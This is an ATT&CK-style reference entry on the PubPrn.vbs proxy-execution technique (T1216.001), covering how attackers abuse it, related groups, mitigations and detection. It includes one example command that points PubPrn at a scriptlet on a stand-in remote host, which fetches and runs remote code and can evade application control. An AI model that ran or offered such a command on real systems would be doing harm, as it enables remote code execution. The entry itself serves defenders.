# PubPrn (T1216.001)

## Description
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic (T1059.005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell (T1059.003) via ```Cscript.exe```. For example, the following code publishes a printer within the specified domain: ```cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com```.

Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites. To do so, adversaries may set the second ```script:``` parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is ```pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct```. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.

In later versions of Windows (10+), ```PubPrn.vbs``` has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to ```LDAP://```, vice the ```script:``` moniker which could be used to reference remote code via HTTP(S).

## Parent Technique
- System Script Proxy Execution (T1216)

## Tactics
- Defense Evasion (TA0005)

## Related Groups
- APT32 (G0050)

## Mitigations
- Execution Prevention (M1038)
- Behavior Prevention on Endpoint (M1040)

## Detection
Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.

### Detailed Detection by Data Source/Component
#### Process: Process Creation (DS0009): 
Monitor script processes, such as `cscript that may be used to proxy execution of malicious files.

#### Command: Command Execution (DS0017): 
Monitor executed commands and arguments for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.

#### Script: Script Execution (DS0012): 
Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. 

